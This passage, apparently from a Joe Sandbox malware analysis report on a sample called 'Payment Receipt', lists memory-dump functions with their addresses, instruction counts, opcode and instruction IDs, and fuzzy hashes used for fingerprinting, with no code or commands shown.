                                                                      • Opcode ID: 29215ad8efcbdcf21b57cf9a1108239e1bbcfbcac65c999ce710f9a4b09204fc
                                                                      • Instruction ID: d44f611daaed2216b832b58f2c7b1b9e81b644cb6a79c368b2fde08ee972c2ad
                                                                      • Opcode Fuzzy Hash: 29215ad8efcbdcf21b57cf9a1108239e1bbcfbcac65c999ce710f9a4b09204fc
                                                                      • Instruction Fuzzy Hash: 3F419E712403028FD725DF68D894B2EBBE9BF80354F58482DE6458F2A1DBB0D965CB92
                                                                      Function 01598B50 Relevance: .1, Instructions: 111COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7f666450ca153c5f524c3216b1fc3b749d50a3cb46b66c7f18b395c2bdc57cc8
                                                                      • Instruction ID: c166793ecf35f94a77f842a529b5d3ffc01dbdadbd12fc67f0b33d84afe67aba
                                                                      • Opcode Fuzzy Hash: 7f666450ca153c5f524c3216b1fc3b749d50a3cb46b66c7f18b395c2bdc57cc8
                                                                      • Instruction Fuzzy Hash: E0418E71E0160ACFCF14DF69C98099DBBF2BF89320F24862ED566AF250D734A901CB51
                                                                      Function 0166FB76 Relevance: .1, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3b517085bbd5ea3ec9cb8e1f3040013ce493ea1d41942f5f8852c3dd842221d9
                                                                      • Instruction ID: e2afb3c4bf3492e88c6f7b02fe0d36ba2d612468591281e1d68f7da5bd691383
                                                                      • Opcode Fuzzy Hash: 3b517085bbd5ea3ec9cb8e1f3040013ce493ea1d41942f5f8852c3dd842221d9
                                                                      • Instruction Fuzzy Hash: 6031C331610105BBD7148F69ED64A9BBBEEFF88354F0585A8F908CB245DB34E912C7A4
                                                                      Function 015B02E1 Relevance: .1, Instructions: 106COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                      • Instruction ID: 6b0912b01b4857e2abd1685ad568d1a55f3fb8162437f2ce8cd287f26c2600ca
                                                                      • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                      • Instruction Fuzzy Hash: C8310631A05245AFDB228B68CC84BEFBBF9BF54350F0445A5F425DB392D6749844CB60
                                                                      Function 0164E3DB Relevance: .1, Instructions: 105COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 528681b196285f14aa05104b5962e621f207033e0524143f7589fc06d976b74c
                                                                      • Instruction ID: 5c1f73cc505bfb733c0dc7d82e50e952e48a19fa0e95e6017f710e09ffcbb322
                                                                      • Opcode Fuzzy Hash: 528681b196285f14aa05104b5962e621f207033e0524143f7589fc06d976b74c
                                                                      • Instruction Fuzzy Hash: 6831AA31751706ABD7229FA58C81FAF77A5FF98B50F010068F600AF391DAA9DD05C790
                                                                      Function 01654B4B Relevance: .1, Instructions: 104COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9a38079dab3264ce8199ddef744e33876f5d6a2bd637bba7842d866dde194d39
                                                                      • Instruction ID: b2265c0d98f8df850a5d91ffd7a6130eddcc9561d6ab327a9b1aeeb365d91b39
                                                                      • Opcode Fuzzy Hash: 9a38079dab3264ce8199ddef744e33876f5d6a2bd637bba7842d866dde194d39
                                                                      • Instruction Fuzzy Hash: B031CF326052018FC721DF19DC80E66B7FAFFC1360F0A44AEE9959B351EB30A895CB91
                                                                      Function 015A4260 Relevance: .1, Instructions: 102COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0c6d2e7331ee800925a96a48052f51e3e2aad540b0719a40b04f0ab7b98b46b9
                                                                      • Instruction ID: d7d42e7c8edb864144aeccdd17d7b4db677a48f265eb13ecb05957434ad0d959
                                                                      • Opcode Fuzzy Hash: 0c6d2e7331ee800925a96a48052f51e3e2aad540b0719a40b04f0ab7b98b46b9
                                                                      • Instruction Fuzzy Hash: 01419E71240B46DFD726CF68C885BDB7BE9BF45354F048829E6998B390D7B4E844CB90
                                                                      Function 01654BB0 Relevance: .1, Instructions: 101COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 17802cff268928a8828930eaa33864c46bdacd70eb082103c91136bbc423ee2d
                                                                      • Instruction ID: 12fb91e4558ef41016800faee1d3a451615de3862dd8973ec2da66ae3d485a22
                                                                      • Opcode Fuzzy Hash: 17802cff268928a8828930eaa33864c46bdacd70eb082103c91136bbc423ee2d
                                                                      • Instruction Fuzzy Hash: 6C3169716043029FD360DF28CC80A6AB7E5FBC4620F0549ADF9659B391EB30E895CBA1
                                                                      Function 0161EB1D Relevance: .1, Instructions: 100COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bfc6d1a0fd01e46b028c385a9c9bd73e0ae7c424d687ba7834e9cdfaf9783381
                                                                      • Instruction ID: b676a3487ddc7836e7423a60e70b5f266447d9f8ddb774469b5bfe9952aaffa5
                                                                      • Opcode Fuzzy Hash: bfc6d1a0fd01e46b028c385a9c9bd73e0ae7c424d687ba7834e9cdfaf9783381
                                                                      • Instruction Fuzzy Hash: 7F31B2717016829BF3235B5CCE88B65BBD8BF40B84F1D04A4AE469B7D5DB29D841C225
                                                                      Function 016661C3 Relevance: .1, Instructions: 97COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 303849b73798721dcab4566e64987abaac1d4ef91bf7c2219a49d48b2cfb592d
                                                                      • Instruction ID: 3fa76dd1caa57a4f27d1f3a06621c5488b959975b462d1e9ccd2f74bcef9a405
                                                                      • Opcode Fuzzy Hash: 303849b73798721dcab4566e64987abaac1d4ef91bf7c2219a49d48b2cfb592d
                                                                      • Instruction Fuzzy Hash: EF31B076A0025AABDB15DF98DC84BAEB7BDFB44B40F458168E900EB244D770AD01CBA4
                                                                      Function 0164483A Relevance: .1, Instructions: 96COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 569b488c344368cf610736a675464cacaf7736c2e0bb9489381d98794f70a905
                                                                      • Instruction ID: 6af9896d591fc334b8957761cb113f5db8b5b1d89cf316ff31d0770d7c3f23c1
                                                                      • Opcode Fuzzy Hash: 569b488c344368cf610736a675464cacaf7736c2e0bb9489381d98794f70a905
                                                                      • Instruction Fuzzy Hash: 05313076A4012DABCF61DF54DC89BDEBBBABB98350F1400E5E508A7250DB309E919F90
                                                                      Function 015CEB20 Relevance: .1, Instructions: 96COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 70dc27dd73d04e4c9e816d355c813d44b88aab1bd3a0a7650fb0320b8ceb6e48
                                                                      • Instruction ID: b27434ee72f16759a292d26fda5d5dda5a2af40bf5c34ce370c2b8ebda2ecf85
                                                                      • Opcode Fuzzy Hash: 70dc27dd73d04e4c9e816d355c813d44b88aab1bd3a0a7650fb0320b8ceb6e48
                                                                      • Instruction Fuzzy Hash: 49317272E01219AFDB31DFA9CC41AAFBBF9FF44750F114469E515EB290D6749A008BA0
                                                                      Function 01666BD7 Relevance: .1, Instructions: 96COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c398b6e77cde029a230d927f3baca188a5172fd94b531bb716ee6e7616e29ef8
                                                                      • Instruction ID: 64696ac8d7c4e09f479e9884a4969b88d4492aae518158fb5bea126a4855ef82
                                                                      • Opcode Fuzzy Hash: c398b6e77cde029a230d927f3baca188a5172fd94b531bb716ee6e7616e29ef8
                                                                      • Instruction Fuzzy Hash: 65318131600205ABCB24CF39EDC5A4B7BE8FF48244F818469E908DF249D770E916CBA4
                                                                      Function 016660B8 Relevance: .1, Instructions: 95COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c9f622eb619560ee5963b684aef0999f0ad4900ce541ab624030accac7d35d63
                                                                      • Instruction ID: 11b55f28ed912b86968d7fd740a727e30521824fb8e91f6eaecf9f855a588e4d
                                                                      • Opcode Fuzzy Hash: c9f622eb619560ee5963b684aef0999f0ad4900ce541ab624030accac7d35d63
                                                                      • Instruction Fuzzy Hash: 8831B471A00606EFDB229FADDC50B6ABBBDBF84755F014069E506DB351DA70ED018BD0
                                                                      Function 015A07AF Relevance: .1, Instructions: 95COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 96e9258c53201abc6e0fe32c43d708c91f53be3c37e1fa133180ad95107113ab
                                                                      • Instruction ID: e01921e9592e2ed9ec08a1ed8903b58819176d604ea6fe9123cacfac4746e8b4
                                                                      • Opcode Fuzzy Hash: 96e9258c53201abc6e0fe32c43d708c91f53be3c37e1fa133180ad95107113ab
                                                                      • Instruction Fuzzy Hash: 8F31F132A94203DBC712DE28C890A6FBBE5FFD4250F414829FD05AF250DA30DC0187E5
                                                                      Function 015A8550 Relevance: .1, Instructions: 94COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fcff3e90688951e2b5b1f7d502ad0eac9fadf725a35c187ada65de56d4a7728d
                                                                      • Instruction ID: 790115fd6ba8d8d3e7cb0222fd289de3dbf42cd1a8133d91d843e39affe17abe
                                                                      • Opcode Fuzzy Hash: fcff3e90688951e2b5b1f7d502ad0eac9fadf725a35c187ada65de56d4a7728d
                                                                      • Instruction Fuzzy Hash: F23178B16093029FE725CF19C848B2BBBE5BF88700F44496DE9899B391D770E844CB91
                                                                      Function 015DA6C7 Relevance: .1, Instructions: 92COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                      • Instruction ID: 03cd372d9100808772fc6eec5f7c87afe00cf5c0bb700d0d91d781e17be3cba6
                                                                      • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                      • Instruction Fuzzy Hash: 203116B2B00B01AFD775CF6DCD40B57BBF8BB48A50F09092DA99AC7650E770E9008B60
                                                                      Function 0164EBD0 Relevance: .1, Instructions: 91COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f1cbcc952d9e84bdc51905fc0f0b50fa78070930be89dbd8e4c8e42be7e5cab6
                                                                      • Instruction ID: eef724e8978fb34d70265e961967fcb96243fb1d75db46d0158d43822eabe54c
                                                                      • Opcode Fuzzy Hash: f1cbcc952d9e84bdc51905fc0f0b50fa78070930be89dbd8e4c8e42be7e5cab6
                                                                      • Instruction Fuzzy Hash: 4931ABB1605302CFCB11DF19C98086ABBF5FF89214F0449AEE4A99B351D336E945CF9A
                                                                      Function 015C438F Relevance: .1, Instructions: 89COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b7564392e023054c7b0d3403579d7d51d6a2aee688ce2912a4197248ab8bcae6
                                                                      • Instruction ID: 8ad289ea81ea605a344dcc264f546fc750c637a0d2889a027d5f6503be090668
                                                                      • Opcode Fuzzy Hash: b7564392e023054c7b0d3403579d7d51d6a2aee688ce2912a4197248ab8bcae6
                                                                      • Instruction Fuzzy Hash: 1A31B131B102069FD724EFE8CD90EAEBBF9BB94B44F108529D105DB294D730E941CBA0
                                                                      Function 0159CB7E Relevance: .1, Instructions: 89COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                      • Instruction ID: 78310ca43e725cfa379a74d573cddcfb21a2955825c3076cc2df2b016412366b
                                                                      • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                      • Instruction Fuzzy Hash: C821F536E0025BAADB109BB9C841BAFBBB5FF54740F0584399A19EF240E270D90087A2
                                                                      Function 0159C156 Relevance: .1, Instructions: 88COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a249ffbe301289f375029df5658a5975677c4a96fa7bd5c5a9621828c9196f0d
                                                                      • Instruction ID: c0bf0f6e3c995b86e5d37f3bab6c8fc16a5e00f5ea1e0a9e1ffc25780fbf7028
                                                                      • Opcode Fuzzy Hash: a249ffbe301289f375029df5658a5975677c4a96fa7bd5c5a9621828c9196f0d
                                                                      • Instruction Fuzzy Hash: C1313B725002118BDB21AF58CC81BAD7BB4BF91314F5485ADDA459F382EA74D981CBA0
                                                                      Function 0165C3CD Relevance: .1, Instructions: 88COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                      • Instruction ID: a9b40fff1bb5f075c151704a52c45c6dc9a9d2e6a26e2661710bfc07e0e75b5c
                                                                      • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                      • Instruction Fuzzy Hash: 30210836A00757A6CF25AB95CC00EBEBFB9EF80614F40801EFE958A691E734D940C3A0
                                                                      Function 0159E420 Relevance: .1, Instructions: 88COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 79debc56e60cb46763e4724e1bd417a76a356160c78e606e97b3bf0899e76918
                                                                      • Instruction ID: 7a722a4d9833ac94648cf59c2d7772d47f6112a24c54acd3caee172c5360faa2
                                                                      • Opcode Fuzzy Hash: 79debc56e60cb46763e4724e1bd417a76a356160c78e606e97b3bf0899e76918
                                                                      • Instruction Fuzzy Hash: 1F31C431A0011D9BDF35DB18CC42FEE77B9FB55740F0104A1E649AF290D674AE808FA2
                                                                      Function 015D4588 Relevance: .1, Instructions: 87COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                      • Instruction ID: 920051e0f3de64bd65dac81885e08b730f523f1dfea034c7bd05b9a82af0c5db
                                                                      • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                      • Instruction Fuzzy Hash: B7216075A00649EFCB25CF58C980A8EBBA5FF48714F108465EE169F681D671EA05CB90
                                                                      Function 015D44B0 Relevance: .1, Instructions: 87COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bc8183334af5fc13e82c728e91a2da6b4acf6e2f59caf2285aed7a9afbb1b2df
                                                                      • Instruction ID: 324cf4d7baa471552bd595e9a8675ca520f4765509ec162feb3996c7892333fa
                                                                      • Opcode Fuzzy Hash: bc8183334af5fc13e82c728e91a2da6b4acf6e2f59caf2285aed7a9afbb1b2df
                                                                      • Instruction Fuzzy Hash: 9121BF726047469BCB22CF5CC880B6B77E4FB88760F444929F959AFA41D730E900CBA2
                                                                      Function 016703E6 Relevance: .1, Instructions: 86COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: af3d9dfc6f2ee9afedeb8bab99b5afba07bfdaca456c027d234f7db42a511ca7
                                                                      • Instruction ID: 105d2d2d702bf6c52af2330d3eae5f358b0ef81733ab7d72fdc69822a9a54811
                                                                      • Opcode Fuzzy Hash: af3d9dfc6f2ee9afedeb8bab99b5afba07bfdaca456c027d234f7db42a511ca7
                                                                      • Instruction Fuzzy Hash: D8315E71A01119BBCB18CFA5CD94AAFBBB9FB88214F014169F905E3204DB30AD15CBA0
                                                                      Function 0159E388 Relevance: .1, Instructions: 86COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                      • Instruction ID: bc4c36d92915baebed1a525a749438d16b86a1830427bf09c50693734822ebae
                                                                      • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                      • Instruction Fuzzy Hash: E4319A31600605EFEB21CFA8C985F6AB7F9FF85354F1449A9E5568B290E730EE01CB51
                                                                      Function 0161E609 Relevance: .1, Instructions: 86COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: da68549d3edea87e8a1d467f66bda6aab2e7cd01bc90ea66f7d5360025cadf25
                                                                      • Instruction ID: 159fe1d2c58aa189ba5eaf3bf3a91ec4a8c01d7117d4c1273478906a43569618
                                                                      • Opcode Fuzzy Hash: da68549d3edea87e8a1d467f66bda6aab2e7cd01bc90ea66f7d5360025cadf25
                                                                      • Instruction Fuzzy Hash: 1E319F75A00216DFCB19CF1CCC849AEB7B5FF84304B59485AEC099B399E732EA51CB90
                                                                      Function 01670591 Relevance: .1, Instructions: 84COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c6f459cc78669d73d0d68c1a766932fcfb51e260090ddfaf2f817b660441b9b3
                                                                      • Instruction ID: cfbcec3d91facc92e0959c027fc703ad81d2a52e46c3f6856b3dd566c91c8869
                                                                      • Opcode Fuzzy Hash: c6f459cc78669d73d0d68c1a766932fcfb51e260090ddfaf2f817b660441b9b3
                                                                      • Instruction Fuzzy Hash: F021E1326102058FE728CE2DDD90676B7A6EFC6310F654438E904DB285DB70F856C7A0
                                                                      Function 016206F1 Relevance: .1, Instructions: 79COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: da2a8c498cb0794506297ff1c64bf2c7fd6770442e784782ea29fb3d39ea5c03
                                                                      • Instruction ID: 9ce0f35d7d15d37ef7db493dbe01255a975af0649124a708f83ce423b932678c
                                                                      • Opcode Fuzzy Hash: da2a8c498cb0794506297ff1c64bf2c7fd6770442e784782ea29fb3d39ea5c03
                                                                      • Instruction Fuzzy Hash: 0A217C7190062AABCF25DF59CC81ABEB7F8FF48740B500069F941AB250D778AD52CFA1
                                                                      Function 0162019F Relevance: .1, Instructions: 78COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 69570960d704c04754cacf2225dd56d7959fe216716b4d0b6be2a863a5e3b449
                                                                      • Instruction ID: f9a4409c852afa2916c071d0c3c6345fca30df66ab42f5c56f7d873fdaa1206b
                                                                      • Opcode Fuzzy Hash: 69570960d704c04754cacf2225dd56d7959fe216716b4d0b6be2a863a5e3b449
                                                                      • Instruction Fuzzy Hash: E5218D71A00A55AFD715DFA8CC84A69B7A8FF88740F14406AF904DB7A0D734ED40CB54
                                                                      Function 01620283 Relevance: .1, Instructions: 74COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1e045e69206ef1ab5c53649269f04afd6d1fa599247ed4c1ef291b0fac181ecb
                                                                      • Instruction ID: 60030cf31161c57830a94da7341b0e547464f8cb319e8b6d4d1c2ed5746b904f
